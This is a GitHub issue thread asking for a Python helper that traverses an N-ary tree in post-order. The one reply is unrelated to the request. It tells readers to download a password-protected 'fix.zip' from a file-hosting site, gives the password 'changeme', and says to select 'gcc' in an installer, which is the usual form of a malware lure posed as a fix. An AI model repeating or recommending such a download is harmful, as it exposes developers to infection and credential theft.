### ISSUE TITLE
Add a Python goody for traversing an N-ary tree in post-order

### ISSUE THREAD

**Issue by miorel** [code-chronicles-code/leetcode-curriculum#394]
For inspiration, take a look at the TypeScript goody added in #388, currently located at [`workspaces/adventure-pack/goodies/typescript/traversePostOrderNAry/index.ts`](../tree/main/workspaces/adventure-pack/goodies/typescript/traversePostOrderNAry/index.ts).

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
